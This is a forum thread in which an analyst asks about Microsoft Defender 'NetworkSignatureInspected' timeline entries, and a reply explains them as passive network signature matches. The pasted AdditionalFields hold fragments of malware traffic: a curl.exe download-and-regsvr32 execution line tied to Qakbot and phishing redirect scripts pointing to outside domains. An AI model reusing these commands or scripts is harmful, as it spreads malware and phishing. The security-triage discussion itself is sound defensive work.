Forum Discussion
NetworkSignatureInspected
Hi,
Whilst looking into something, I was thrown off by a line in a device timeline export, with ActionType of NetworkSignatureInspected, and the content.
I've read this article, so understand the basics of the function:
Enrich your advanced hunting experience using network layer signals from Zeek
I popped over to Sentinel to widen the search as I was initially concerned, but now think it's expected behaviour as I see the same data from different devices.
Can anyone provide any clarity on the contents of AdditionalFields, where the ActionType is NetworkSignatureInspected, references for example CVE-2021-44228:
${token}/sendmessage`,{method:"post",%90%00%02%10%00%00%A1%02%01%10*%A9Cj)|%00%00$%B7%B9%92I%ED%F1%91%0B\%80%8E%E4$%B9%FA%01.%EA%FA<title>redirecting...</title><script>window.location.href="https://uyjh8.phiachiphe.ru/bjop8dt8@0uv0/#%90%02%1F@%90%02%1F";%90%00!#SCPT:Trojan:BAT/Qakbot.RVB01!MTB%00%02%00%00%00z%0B%01%10%8C%BAUU)|%00%00%CBw%F9%1Af%E3%B0?\%BE%10|%CC%DA%BE%82%EC%0B%952&&curl.exe--output%25programdata%25\xlhkbo\ff\up2iob.iozv.zmhttps://neptuneimpex.com/bmm/j.png&&echo"fd"&®svr32"%90%00!#SCPT:Trojan:HTML/Phish.DMOH1!MTB%00%02%00%00%00{%0B%01%10%F5):[)|%00%00v%F0%ADS%B8i%B2%D4h%EF=E"#%C5%F1%FFl>J<scripttype="text/javascript">window.location="https://
Defender reports no issues on the device and logs (for example DeviceNetworkEvents or CommonSecurityLog) don't return any hits for the sites referenced.
Any assistance with rationalising this would be great, thanks.
1 Reply
That’s a really good and subtle observation, and what you’re seeing is actually expected behavior rather than evidence of an active compromise. As of December 2025, entries in DeviceTimeline (or Advanced Hunting) with ActionType = NetworkSignatureInspected are generated by the network inspection engine in Microsoft Defender for Endpoint (MDE). This engine integrates lightweight Zeek-based inspection telemetry into the endpoint sensor. These records represent passive detections of network-layer patterns that Defender recognized and analyzed, not necessarily blocked or executed payloads.
The AdditionalFields content you’re seeing is a raw snippet of payload data that matched a known network signature .. in your case, one related to CVE-2021-44228 (Log4Shell) and some strings commonly used by Qakbot or phishing scripts. Defender is flagging that pattern because its sensor saw traffic that resembled an exploit attempt, perhaps a malformed HTTP request or an external scan. It doesn’t mean the device executed malicious code or contacted those domains. The sensor simply captured the payload signature while inspecting inbound or outbound packets. The same pattern appearing across multiple devices confirms that it was a signature match from a scan or external probe, not a localized infection.
Because these network inspection events don’t always map to full detections, they don’t raise an alert or show up in Defender’s threat summary. They are primarily included to enrich hunting data and give you network visibility at the packet level. If you check the related device’s DeviceNetworkEvents, you likely won’t see any confirmed connections to those URLs because the request never completed or was intercepted at the inspection layer. The absence of alerts or follow-up activity means Defender treated it as benign background noise or blocked the traffic before any payload was delivered.
Basically NetworkSignatureInspected entries indicate that Defender’s network protection module analyzed traffic matching a known signature but didn’t find evidence of compromise. The payloads in the AdditionalFields are fragments of suspicious data observed on the wire, not code that executed on the device. They are useful for correlation and threat hunting but don’t require remediation unless accompanied by alerts or process execution events. Please hit like if you like the solution.
